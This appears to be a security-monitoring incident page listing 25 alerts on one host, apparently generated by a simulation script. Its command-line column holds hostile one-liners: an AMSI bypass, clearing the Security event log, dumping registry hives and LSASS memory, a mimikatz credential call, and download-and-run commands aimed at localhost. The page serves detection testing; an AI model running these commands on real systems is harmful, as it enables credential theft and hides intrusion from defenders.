Back to list
Critical CINC-20251221-5F0B9576 new
Aggregate ID: aggind:47186ef241ea495885522e5d4930eda3:9133821177
Incident Overview
Incident ID
CINC-20251221-5F0B9576
Severity
Critical (90)
Status
new
Alert Count
25
Host Count
1
Timeline
First Seen
2025-12-22 04:05:35
Last Seen
2025-12-22 04:07:48
Duration
0d 0h 2m
Created
2025-12-22 08:36
Updated
2026-01-13 15:14
Kill Chain Analysis
Rec...
Ini...
Exe...
Per...
Pri...
Def...
Cre...
Dis...
Lat...
Col...
Com...
Exf...
Imp...
Observed Tactics:
Techniques:
Affected Hosts (1)
Related Alerts (25)
| Severity | Status | Hostname | Description | Tactic | Command Line | Time |
|---|---|---|---|---|---|---|
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-22 04:07 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-22 04:07 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:07 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-22 04:06 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-22 04:06 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-22 04:06 | |
| Critical | new | TEAHEE | Credential Access | reg save HKLM\SECURITY C:\Users\dokji\AppData\Local\Temp\security.hiv | 12-22 04:06 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-22 04:06 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-22 04:06 | |
| High | new | TEAHEE | Defense Evasion | wevtutil cl Security | 12-22 04:06 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06 | |
| High | new | TEAHEE | AI Powered IOA | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06 | |
| High | new | TEAHEE | Execution | powershell -c "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)" | 12-22 04:06 | |
| High | new | TEAHEE | Execution | C:\WINDOWS\system32\cmd.exe /c "powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/ps')"" | 12-22 04:06 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06 | |
| High | new | TEAHEE | Persistence | msiexec /q /i http://127.0.0.1/test.msi | 12-22 04:06 | |
| High | new | TEAHEE | Defense Evasion | regsvr32 /s /n /u /i:http://127.0.0.1/test.sct scrobj.dll | 12-22 04:06 | |
| High | new | TEAHEE | Credential Access | C:\WINDOWS\system32\cmd.exe /c "powershell sekurlsa::logonpasswords" | 12-22 04:06 | |
| High | new | TEAHEE | Defense Evasion | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-22 04:06 | |
| Critical | new | TEAHEE | Credential Access | rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full | 12-22 04:06 | |
| High | new | TEAHEE | Defense Evasion | C:\WINDOWS\system32\cmd.exe /c "rundll32 comsvcs.dll MiniDump 123 C:\Users\dokji\AppData\Local\Temp\dump.dmp full" | 12-22 04:06 | |
| Informational | new | TEAHEE | Execution | "python" mega_incident_generator.py --rounds 2 --interval 30 | 12-22 04:05 |